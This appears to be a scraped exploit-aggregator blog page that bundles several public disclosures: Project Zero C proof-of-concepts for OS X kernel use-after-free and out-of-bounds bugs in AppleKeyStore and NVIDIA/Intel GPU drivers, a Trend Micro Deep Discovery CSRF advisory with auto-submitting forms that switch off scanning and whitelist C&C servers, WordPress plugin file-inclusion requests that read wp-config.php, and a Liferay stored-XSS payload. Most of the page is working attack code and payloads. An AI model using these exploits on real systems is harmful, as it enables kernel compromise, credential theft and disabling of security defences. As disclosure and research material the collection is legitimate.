/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=710
The AppleKeyStore userclient uses an IOCommandGate to serialize access to its userclient methods, however
by racing two threads, one of which closes the userclient (which frees the IOCommandGate)
and one of which tries to make an external method call we can cause a use-after-free of the IOCommandGate.
Tested on OS X 10.11.3 El Capitan 15D21 on MacBookAir5,2
*/
//ianbeer
//build: clang -o applekeystore_race applekeystore_race.c -framework IOKit -lpthread
//repro: while true; do ./applekeystore_race; done
// try adding -zc -zp gzalloc_min=80 gzalloc_max=120 to your boot args to crash on the use after free
/*
OS X Kernel use-after-free in AppleKeyStore
The AppleKeyStore userclient uses an IOCommandGate to serialize access to its userclient methods, however
by racing two threads, one of which closes the userclient (which frees the IOCommandGate)
and one of which tries to make an external method call we can cause a use-after-free of the IOCommandGate.
Tested on OS X 10.11.3 El Capitan 15D21 on MacBookAir5,2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <IOKit/IOKitLib.h>
#include <libkern/OSAtomic.h>
#include <mach/thread_act.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
unsigned int selector = 0;
uint64_t inputScalar[16];
size_t inputScalarCnt = 0;
uint8_t inputStruct[40960];
size_t inputStructCnt = 0;
uint64_t outputScalar[16] = {0};
uint32_t outputScalarCnt = 0;
char outputStruct[40960] = {0};
size_t outputStructCnt = 0;
io_connect_t global_conn = MACH_PORT_NULL;
void set_params(io_connect_t conn){
global_conn = conn;
selector = 0;
inputScalarCnt = 4;
inputStructCnt = 0;
outputScalarCnt = 16;
outputStructCnt = 40960;
}
void make_iokit_call(){
IOConnectCallMethod(
global_conn,
selector,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
}
OSSpinLock lock = OS_SPINLOCK_INIT;
void* thread_func(void* arg){
int got_it = 0;
while (!got_it) {
got_it = OSSpinLockTry(&lock);
}
make_iokit_call();
return NULL;
}
mach_port_t get_user_client(char* name, int type) {
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching(name);
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got userclient connection: %x\n", conn);
return conn;
}
int main(int argc, char** argv){
OSSpinLockLock(&lock);
pthread_t t;
pthread_create(&t, NULL, thread_func, NULL);
mach_port_t conn = get_user_client("AppleKeyStore", 0);
set_params(conn);
OSSpinLockUnlock(&lock);
IOServiceClose(conn);
return 0;
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863286765
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=709
nvDevice::ReleaseDeviceTexture is external method 0x10a of userclient 5 of the geforce IOAccelerator.
It takes a single uint argument
__text:000000000001BCD2 mov r14d, esi
...
__text:000000000001BD08 and r14d, 7FFFFFFFh <-- clear upper bit
__text:000000000001BD0F mov rax, [r15+168h]
__text:000000000001BD16 mov rdi, [rax+r14*8] <-- use as array index
__text:000000000001BD1A test rdi, rdi
__text:000000000001BD1D jz short loc_1BD2C
__text:000000000001BD1F mov rax, [rdi] <-- read vtable
__text:000000000001BD22 call qword ptr [rax+28h] <-- call OSObject::release
This userclient is part of the nvidia geforce driver so it's only available on devices with that hardware (eg macbookpro.)
This code is reachable from most interesting sandboxes including the safari renderer and the chrome GPU process.
*/
//ianbeer
// build: clang -o nv_oob nv_oob.c -framework IOKit
// tested on MacBookPro 10,1 w/10.11.3 (15D21) - if you test on machine with a different graphics setup then make you open the correct user client :)
/*
OS X Kernel unchecked array index used to read object pointer then call virtual method in nvdia geforce driver
nvDevice::ReleaseDeviceTexture is external method 0x10a of userclient 5 of the geforce IOAccelerator.
It takes a single uint argument
__text:000000000001BCD2 mov r14d, esi
...
__text:000000000001BD08 and r14d, 7FFFFFFFh <-- clear upper bit
__text:000000000001BD0F mov rax, [r15+168h]
__text:000000000001BD16 mov rdi, [rax+r14*8] <-- use as array index
__text:000000000001BD1A test rdi, rdi
__text:000000000001BD1D jz short loc_1BD2C
__text:000000000001BD1F mov rax, [rdi] <-- read vtable
__text:000000000001BD22 call qword ptr [rax+28h] <-- call OSObject::release
This userclient is part of the nvidia geforce driver so it's only available on devices with that hardware (eg macbookpro.)
This code is reachable from most interesting sandboxes including the safari renderer and the chrome GPU process.
*/
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
uint64_t release_device_texture(mach_port_t conn) {
kern_return_t err;
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
char inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0;
inputScalarCnt = 1;
inputStructCnt = 0;
outputScalarCnt = 0;
outputStructCnt = 0;
inputScalar[0] = 0x0f0f0f0f;
err = IOConnectCallMethod(
conn,
0x10a,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
} else{
printf("worked?\n");
}
return 0;
}
mach_port_t get_user_client(char* name, int type) {
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching(name);
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got userclient connection: %x\n", conn);
return conn;
}
int main(int argc, char** argv){
mach_port_t gl_context = get_user_client("IOAccelerator", 5);
release_device_texture(gl_context);
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=708
The external methods IGAccelGLContext::unmap_user_memory and IGAccelCLContext::unmap_user_memory take
an 8 byte struct input which is a user-space pointer previously passed to the equivilent map_user_memory
method.
The Context objects have inline IGHashTable members which store a mapping between those user pointers
and the IGAccelMemoryMap object pointers to which they refer in the kernel. The unmap_user_memory method
calls in order:
::contains
::get
::remove
on the hashmap *before* taking the context's IOLock. This means we can race two threads and by passing them both a valid
mapped user pointer they will both look up the same value in the hash map and return it.
The first exploitable bug is that none of these methods are thread safe; it's quite possible for two threads to be in the
::remove method at the same time and call IOFree on the hash bucket list entry resulting in a double free.
The second bug is that after the call to ::remove although a lock is taken on the Context by this point it's too late; both threads have a pointer to
the same IGAccelMemoryMap which only has one reference. The first thread will call ::release which will free the object, then
the thread will drop the lock, the second thread will acquire it and then use the free'd object before calling ::release again.
This user client code is reachable from many sandboxes including the safari renderer and the chrome gpu process.
*/
//ianbeer
// build: clang -o ig_gl_unmap_racer ig_gl_unmap_racer.c -framework IOKit -lpthread
// repro: while true; do ./ig_gl_unmap_racer; done
// (try something like this in your boot-args for a nice panic log: gzalloc_min=0x80 gzalloc_max=0x120 -zc -zp)
/*
Use after free and double delete due to incorrect locking in Intel GPU Driver
The external methods IGAccelGLContext::unmap_user_memory and IGAccelCLContext::unmap_user_memory take
an 8 byte struct input which is a user-space pointer previously passed to the equivilent map_user_memory
method.
The Context objects have inline IGHashTable members which store a mapping between those user pointers
and the IGAccelMemoryMap object pointers to which they refer in the kernel. The unmap_user_memory method
calls in order:
::contains
::get
::remove
on the hashmap *before* taking the context's IOLock. This means we can race two threads and by passing them both a valid
mapped user pointer they will both look up the same value in the hash map and return it.
The first exploitable bug is that none of these methods are thread safe; it's quite possible for two threads to be in the
::remove method at the same time and call IOFree on the hash bucket list entry resulting in a double free.
The second bug is that after the call to ::remove although a lock is taken on the Context by this point it's too late; both threads have a pointer to
the same IGAccelMemoryMap which only has one reference. The first thread will call ::release which will free the object, then
the thread will drop the lock, the second thread will acquire it and then use the free'd object before calling ::release again.
This user client code is reachable from many sandboxes including the safari renderer and the chrome gpu process.
*/
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <libkern/OSAtomic.h>
#include <mach/thread_act.h>
#include <pthread.h>
#include <IOKit/IOKitLib.h>
struct mem_desc {
uint64_t ptr;
uint64_t size;
};
uint64_t map_user_memory(mach_port_t conn) {
kern_return_t err;
void* mem = malloc(0x20000);
// make sure that the address we pass is page-aligned:
mem = (void*) ((((uint64_t)mem)+0x1000)&~0xfff);
printf("trying to map user pointer: %p\n", mem);
uint64_t inputScalar[16] = {0};
uint64_t inputScalarCnt = 0;
char inputStruct[4096] = {0};
size_t inputStructCnt = 0;
uint64_t outputScalar[16] = {0};
uint32_t outputScalarCnt = 0;
char outputStruct[4096] = {0};
size_t outputStructCnt = 0;
inputScalarCnt = 0;
inputStructCnt = 0x10;
outputScalarCnt = 4096;
outputStructCnt = 16;
struct mem_desc* md = (struct mem_desc*)inputStruct;
md->ptr = (uint64_t)mem;
md->size = 0x1000;
err = IOConnectCallMethod(
conn,
0x200, // IGAccelGLContext::map_user_memory
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
//return 0;
} else{
printf("worked? outputScalarCnt = %d\n", outputScalarCnt);
}
printf("outputScalarCnt = %d\n", outputScalarCnt);
md = (struct mem_desc*)outputStruct;
printf("0x%llx :: 0x%llx\n", md->ptr, md->size);
return (uint64_t)mem;
}
uint64_t unmap_user_memory(mach_port_t conn, uint64_t handle) {
kern_return_t err;
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
char inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0;
inputScalarCnt = 0;
inputStructCnt = 0x8;
outputScalarCnt = 4096;
outputStructCnt = 16;
*((uint64_t*)inputStruct) = handle;
err = IOConnectCallMethod(
conn,
0x201, // IGAccelGLContext::unmap_user_memory
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
} else{
printf("worked?\n");
}
return 0;
}
mach_port_t get_user_client(char* name, int type) {
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching(name);
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
// should be intel integrated graphics (only tested on MBA)
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got userclient connection: %x\n", conn);
return conn;
}
mach_port_t gl_context = MACH_PORT_NULL;
uint64_t handle = 0;
OSSpinLock lock = OS_SPINLOCK_INIT;
void go(void* arg){
int got_it = 0;
while (!got_it) {
got_it = OSSpinLockTry(&lock);
}
//usleep(1);
unmap_user_memory(gl_context, handle);
printf("called unmap from thread\n");
}
int main(int argc, char** argv){
// get an IGAccelGLContext
gl_context = get_user_client("IOAccelerator", 1);
// get a IGAccelSharedUserClient
mach_port_t shared = get_user_client("IOAccelerator", 6);
// connect the gl_context to the shared UC so we can actually use it:
kern_return_t err = IOConnectAddClient(gl_context, shared);
if (err != KERN_SUCCESS){
printf("IOConnectAddClient error: %x\n", err);
return 0;
}
printf("added client to the shared UC\n");
handle = map_user_memory(gl_context);
OSSpinLockLock(&lock);
pthread_t t;
pthread_create(&t, NULL, (void*) go, NULL);
usleep(100000);
OSSpinLockUnlock(&lock);
unmap_user_memory(gl_context, handle);
printf("called unmap from main process thread\n");
pthread_join(t, NULL);
return 0;
}
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-DDI-CSRF.txt
Vendor:
====================
www.trendmicro.com
Product:
=========================================
Trend Micro Deep Discovery Inspector
V3.8, 3.7
Deep Discovery Inspector is a network appliance that gives you 360-degree
network monitoring of all traffic
to detect all aspects of a targeted attack.
Vulnerability Type:
================================
Cross Site Request Forgery - CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
================================
Trend Micro Deep Discovery suffers from multiple CSRF vectors, if an
authenticated user visits an malicious webpage attackers will
have ability to modify many settings of the Deep Discovery application to
that of the attackers choosing.
Reference:
http://esupport.trendmicro.com/solution/en-US/1113708.aspx
Trend Micro DDI is affected by CSRF vulnerabilities. These affect the
following console features:
Deny List Notifications
Detection Rules
Threat Detections
Email Settings
Network
Blacklisting/Whitelisting
Time
Accounts
Power Off / Restart
DETAILS
The following DDI versions prior to version 3.8 Service Pack 2 (SP2) are
affected:
3.8 English
3.8 Japanese
3.7 English
3.7 Japanese
3.7 Simplified Chinese
Trend Micro has released DDI 3.8 SP2. All versions up to version 3.8 SP1
must upgrade to version 3.8 SP2 (Build 3.82.1133) to address this issue.
Exploit code(s):
===============
1) Shut down all threat scans and malicious file submissions under:
Administration /Monitoring / Scanning / Threat Detections
<iframe id="demonica" name="demonica"></iframe>
<form id="CSRF-ThreatScans" target="demonica" action="
https://localhost/php/scan_options.php" method="post">
<input type="hidden" name="act" value="set" />
<input type="hidden" name="enable_all" value="0" />
<input type="hidden" name="enable_vsapi" value="1" />
<input type="hidden" name="enable_marsd" value="1" />
<input type="hidden" name="enable_ops" value="1" />
<input type="hidden" name="enable_block" value="0" />
<input type="hidden" name="enable_feedback" value="0" />
<input type="hidden" name="enable_send_suspicious_file" value="0" />
<script>document.getElementById('CSRF-ThreatScans').submit()</script>
</form>
2) Whitelist C&C server menu location: Detections / C&C Callback Addresses
<form id="CSRF-Whitelist" target="demonica" action="
https://localhost/php/blacklist_whitelist_query.php" method="post">
<input type="hidden" name="black_or_white" value="ccca" />
<input type="hidden" name="action" value="move_to_white_ccca" />
<input type="hidden" name="delete_list" value='"list":[{"name":"
http://bad.place.com/","list_type":"3"}]}"' />
<input type="hidden" name="comments" value="TEST" />
<script>document.getElementById('CSRF-Whitelist').submit()</script>
</form>
3) Turn off or change email notifications
<form id="CSRF-Notifications" target="demonica" action="
https://localhost/cgi-bin/mailSettings_set.cgi" method="post">
<input type="hidden" name="adm_email_address" value="punksnotdead@hell.com"
/>
<input type="hidden" name="sender_address" value="punksnotdead@hell.com" />
<input type="hidden" name="mail_server" value="x.x.x.x" />
<input type="hidden" name="mail_server_port" value="25" />
<input type="hidden" name="showusername" value="" />
<input type="hidden" name="showpassword" value="" />
<input type="hidden" name="max_notification_per_hour" value="5" />
<input type="hidden" name="check_mail_queue" value="60" />
<input type="hidden" name="server" value="x.x.x.x" />
<input type="hidden" name="port" value="25" />
<input type="hidden" name="admin_address" value="" />
<input type="hidden" name="from_address" value="PWNED@PWNED.com" />
<input type="hidden" name="username" value="" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="freq_limit_interval" value="3600" />
<input type="hidden" name="freq_limit_softlimit" value="5" />
<input type="hidden" name="testconnect" value="config" />
<input type="hidden" name="which_cgi_flag" value="" />
<input type="hidden" name="alert_message" value="" />
<input type="hidden" name="save_status" value="false" />
<script>document.getElementById('CSRF-Notifications').submit()</script>
</form>
4) Change system settings ( x.x.x.x = whatever IP we want )
<form id='PWNED' target="demonica" action="
https://localhost/cgi-bin/admin_ip.cgi" method="post">
<input type="hidden" name="txtHostname" value="localhost" />
<input type="hidden" name="radioType" value="radiobutton" />
<input type="hidden" name="txtIP" value="x.x.x.x" />
<input type="hidden" name="txtNetmask" value="255.255.0.0" />
<input type="hidden" name="txtGateway" value="x.x.x.x" />
<input type="hidden" name="txtDNS1" value="x.x.x.x" />
<input type="hidden" name="txtDNS2" value="x.x.x.x" />
<input type="hidden" name="txtIP_ip6" value="" />
<input type="hidden" name="txtIP_ip6_prefix" value="" />
<input type="hidden" name="txtGateway_ip6" value="" />
<input type="hidden" name="txtDNS1_ip6" value="" />
<input type="hidden" name="td_start" value="Start" />
<input type="hidden" name="td_start" value="Start" />
<input type="hidden" name="td_analyze" value="View" />
<input type="hidden" name="td_export" value="Export" />
<input type="hidden" name="td_reset" value="Reset" />
<input type="hidden" name="button1112" value="Cancel" />
<input type="hidden" name="network_type" value="static" />
<input type="hidden" name="act" value="save" />
<input type="hidden" name="Hostname" value="localhost" />
<input type="hidden" name="IP" value="x.x.x.x" />
<input type="hidden" name="Netmask" value="255.255.0.0" />
<input type="hidden" name="Gateway" value="x.x.x.x" />
<input type="hidden" name="DNS1" value="x.x.x.x" />
<input type="hidden" name="DNS2" value="x.x.x.x" />
<input type="hidden" name="enable_ip6" value="no" />
<input type="hidden" name="network_type_ip6" value="static" />
<input type="hidden" name="IP_ip6" value="" />
<input type="hidden" name="IP_ip6_prefix" value="" />
<input type="hidden" name="Gateway_ip6" value="" />
<input type="hidden" name="DNS1_ip6" value="" />
<input type="hidden" name="port1_nic" value="eth0" />
<input type="hidden" name="port1_type" value="auto" />
<input type="hidden" name="port1_speed" value="" />
<input type="hidden" name="port1_duplex" value="" />
<input type="hidden" name="port1_attr" value="MGMT" />
<input type="hidden" name="port1_cap"
value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" />
<input type="hidden" name="port1_state" value="1000" />
<input type="hidden" name="port2_nic" value="eth1" />
<input type="hidden" name="port2_type" value="auto" />
<input type="hidden" name="port2_speed" value="" />
<input type="hidden" name="port2_duplex" value="" />
<input type="hidden" name="port2_attr" value="INT" />
<input type="hidden" name="port2_cap"
value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" />
<input type="hidden" name="port2_state" value="1000" />
<input type="hidden" name="port3_nic" value="eth2" />
<input type="hidden" name="port3_type" value="auto" />
<input type="hidden" name="port3_speed" value="" />
<input type="hidden" name="port3_duplex" value="" />
<input type="hidden" name="port3_attr" value="INT" />
<input type="hidden" name="port3_cap"
value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" />
<input type="hidden" name="port3_state" value="1000" />
<input type="hidden" name="port4_nic" value="eth3" />
<input type="hidden" name="port4_type" value="auto" />
<input type="hidden" name="port4_speed" value="" />
<input type="hidden" name="port4_duplex" value="" />
<input type="hidden" name="port4_attr" value="INT" />
<input type="hidden" name="port4_cap"
value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" />
<input type="hidden" name="port4_state" value="-1" />
<input type="hidden" name="port5_nic" value="eth4" />
<input type="hidden" name="port5_type" value="auto" />
<input type="hidden" name="port5_speed" value="" />
<input type="hidden" name="port5_duplex" value="" />
<input type="hidden" name="port5_attr" value="INT" />
<input type="hidden" name="port5_cap"
value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" />
<input type="hidden" name="port5_state" value="-1" />
<input type="hidden" name="port6_nic" value="eth5" />
<input type="hidden" name="port6_type" value="auto" />
<input type="hidden" name="port6_speed" value="" />
<input type="hidden" name="port6_duplex" value="" />
<input type="hidden" name="port6_attr" value="INT" />
<input type="hidden" name="port6_cap"
value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" />
<input type="hidden" name="port6_state" value="-1" />
<input type="hidden" name="port7_nic" value="eth6" />
<input type="hidden" name="port7_type" value="manual" />
<input type="hidden" name="port7_speed" value="10000" />
<input type="hidden" name="port7_duplex" value="full" />
<input type="hidden" name="port7_attr" value="INT" />
<input type="hidden" name="port7_cap" value="10000F" />
<input type="hidden" name="port7_state" value="-1" />
<input type="hidden" name="port8_nic" value="eth7" />
<input type="hidden" name="port8_type" value="manual" />
<input type="hidden" name="port8_speed" value="10000" />
<input type="hidden" name="port8_duplex" value="full" />
<input type="hidden" name="port8_attr" value="INT" />
<input type="hidden" name="port8_cap" value="10000F" />
<input type="hidden" name="port8_state" value="-1" />
<input type="hidden" name="port9_nic" value="ext3" />
<input type="hidden" name="port9_type" value="auto" />
<input type="hidden" name="port9_speed" value="" />
<input type="hidden" name="port9_duplex" value="" />
<input type="hidden" name="port9_attr" value="N%2FA" />
<input type="hidden" name="port9_cap" value="" />
<input type="hidden" name="port9_state" value="" />
<input type="hidden" name="port10_nic" value="ext4" />
<input type="hidden" name="port10_type" value="auto" />
<input type="hidden" name="port10_speed" value="" />
<input type="hidden" name="port10_duplex" value="" />
<input type="hidden" name="port10_attr" value="N%2FA" />
<input type="hidden" name="port10_cap" value="" />
<input type="hidden" name="port10_state" value="" />
<input type="hidden" name="port11_nic" value="ext5" />
<input type="hidden" name="port11_type" value="auto" />
<input type="hidden" name="port11_speed" value="" />
<input type="hidden" name="port11_duplex" value="" />
<input type="hidden" name="port11_attr" value="N%2FA" />
<input type="hidden" name="port11_cap" value="" />
<input type="hidden" name="port11_state" value="" />
<input type="hidden" name="port12_nic" value="ext6" />
<input type="hidden" name="port12_type" value="auto" />
<input type="hidden" name="port12_speed" value="" />
<input type="hidden" name="port12_duplex" value="" />
<input type="hidden" name="port12_attr" value="N%2FA" />
<input type="hidden" name="port12_cap" value="" />
<input type="hidden" name="port12_state" value="" />
<input type="hidden" name="port13_nic" value="ext7" />
<input type="hidden" name="port13_type" value="auto" />
<input type="hidden" name="port13_speed" value="" />
<input type="hidden" name="port13_duplex" value="" />
<input type="hidden" name="port13_attr" value="N%2FA" />
<input type="hidden" name="port13_cap" value="" />
<input type="hidden" name="port13_state" value="" />
<input type="hidden" name="port14_nic" value="ext8" />
<input type="hidden" name="port14_type" value="auto" />
<input type="hidden" name="port14_speed" value="" />
<input type="hidden" name="port14_duplex" value="" />
<input type="hidden" name="port14_attr" value="N%2FA" />
<input type="hidden" name="port14_cap" value="" />
<input type="hidden" name="port14_state" value="" />
<input type="hidden" name="port15_nic" value="ext9" />
<input type="hidden" name="port15_type" value="auto" />
<input type="hidden" name="port15_speed" value="" />
<input type="hidden" name="port15_duplex" value="" />
<input type="hidden" name="port15_attr" value="N%2FA" />
<input type="hidden" name="port15_cap" value="" />
<input type="hidden" name="port15_state" value="" />
<input type="hidden" name="port16_nic" value="ext10" />
<input type="hidden" name="port16_type" value="auto" />
<input type="hidden" name="port16_speed" value="" />
<input type="hidden" name="port16_duplex" value="" />
<input type="hidden" name="port16_attr" value="N%2FA" />
<input type="hidden" name="port16_cap" value="" />
<input type="hidden" name="port16_state" value="" />
<input type="hidden" name="port17_nic" value="ext11" />
<input type="hidden" name="port17_type" value="auto" />
<input type="hidden" name="port17_speed" value="" />
<input type="hidden" name="port17_duplex" value="" />
<input type="hidden" name="port17_attr" value="N%2FA" />
<input type="hidden" name="port17_cap" value="" />
<input type="hidden" name="port17_state" value="" />
<input type="hidden" name="port18_nic" value="ext12" />
<input type="hidden" name="port18_type" value="auto" />
<input type="hidden" name="port18_speed" value="" />
<input type="hidden" name="port18_duplex" value="" />
<input type="hidden" name="port18_attr" value="N%2FA" />
<input type="hidden" name="port18_cap" value="" />
<input type="hidden" name="port18_state" value="" />
<input type="hidden" name="port19_nic" value="ext13" />
<input type="hidden" name="port19_type" value="auto" />
<input type="hidden" name="port19_speed" value="" />
<input type="hidden" name="port19_duplex" value="" />
<input type="hidden" name="port19_attr" value="N%2FA" />
<input type="hidden" name="port19_cap" value="" />
<input type="hidden" name="port19_state" value="" />
<input type="hidden" name="port20_nic" value="ext14" />
<input type="hidden" name="port20_type" value="auto" />
<input type="hidden" name="port20_speed" value="" />
<input type="hidden" name="port20_duplex" value="" />
<input type="hidden" name="port20_attr" value="N%2FA" />
<input type="hidden" name="port20_cap" value="" />
<input type="hidden" name="port20_state" value="" />
<input type="hidden" name="tcpdump" value="" />
<input type="hidden" name="interface" value="" />
<input type="hidden" name="vlan_enable" value="0" />
<script>document.getElementById('PWNED').submit()</script>
</form>
Disclosure Timeline:
=======================================
Vendor Notification: November 23, 2015
March 25, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
========================================================================
Request Method(s): [+] POST
Vulnerable Product: [+] Trend Micro Deep Discovery Inspector V3.8
========================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
# Exploit Title: Wordpress Plugin IMDb Profile Widget - Local File Inclusion
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-03-26
# Google Dork : inurl:/wp-content/plugins/imdb-widget
# Vendor Homepage: https://wordpress.org/plugins/imdb-widget/
# Tested on: MSWin32
# Version: 1.0.8
# Vuln file : pic.php
<?php
header( 'Content-Type: image/jpeg' );
readfile( $_GET["url"] );
# PoC : /wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php
# Right click -> Save As -> rename pic.jpg in .txt and read file
# 26/03/2016 - Informed Vendor about Issue
# 27/03/2016 - Waiting Reply
# Exploit Title: Wordpress Plugin Photocart Link - Local File Inclusion
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-03-27
# Google Dork : inurl:/wp-content/plugins/photocart-link/
# Vendor Homepage: https://fr.wordpress.org/plugins/photocart-link/
# Tested on: MSWin32
# Version: 1.6
# Vuln file : decode.php
<?php
error_reporting(0);
header("Cache-control: private");
$new = base64_decode($_REQUEST['id']);
header("Content-type: image/jpeg");
header("Content-transfer-encoding: binary\n");
header("Content-Disposition: filename=do_not_copy_these_images");
header('Cache-control: no-cache');
@readfile($new);
?>
# PoC : /wp-content/plugins/photocart-link/decode.php?id=Li4vLi4vLi4vd3AtY29uZmlnLnBocA==
# Right click -> Save As -> and Read with Notepad file Saved
# 27/03/2016 - Vendor Informed about Issues
#Exploit Title: Liferay Portal 5.1.2 - Persistent XSS
#Discovery Date: 2016-02-10
#Exploit Author: Sarim Kiani
#Vendor Homepage: https://www.liferay.com
#Software Link: https://www.liferay.com/community/releases
#Version: 5.1.2
#Tested on: Windows OS
Liferay Portal 5.1.2 is an open source version of Liferay's enterprise web platform for building business solutions that deliver immediate results and long-term value.
1. Vulnerability Description:
A persistent XSS exists in "My Account" page of the application.
2. Proof of Concept:
Any user entering personal information in the "My Account" page of the application can insert XSS Payload in the Form.
Test Payload: "><script>alert(1);</script>
Parameter: _79_jobTitle
Parameter Name: Job Title
POST /user/test/home?p_p_id=79&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&_79_struts_action=%2Fenterprise_admin%2Fedit_user HTTP/1.1
Host: localhost:8082
Content-Length: 2712
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8082/user/test/home?p_p_id=79&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_79_struts_action=%2Fenterprise_admin%2Fedit_user&_79_redirect=http%3A%2F%2Flocalhost%3A8082%2Fuser%2Ftest%2Fhome%3Fp_p_id%3D79%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_79_struts_action%3D%252Fenterprise_admin%252Fview%26_79_tabs1%3Dusers%26_79_tabs2%3D%26_79_tabs3%3D%26_79_keywords%3D%26_79_advancedSearch%3Dfalse%26_79_andOperator%3Dtrue%26_79_firstName%3D%26_79_middleName%3D%26_79_lastName%3D%26_79_screenName%3D%26_79_emailAddress%3D%26_79_active%3Dtrue%26_79_organizationId%3D0%26_79_roleId%3D0%26_79_userGroupId%3D0%26_79_cur%3D1&_79_p_u_i_d=10301
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: LFR_SESSION_STATE_10127=1459071499499; COOKIE_SUPPORT=true; JSESSIONID=F53EC8D33C0D3ED9AD62FDA0BB682201; COMPANY_ID=10106; ID=7a31746f4f4c712f4179453d; PASSWORD=4e4c77485138744d61356f3d; LOGIN=74657374406c6966657261792e636f6d; SCREEN_NAME=4e4c77485138744d61356f3d; GUEST_LANGUAGE_ID=en_US
Connection: close
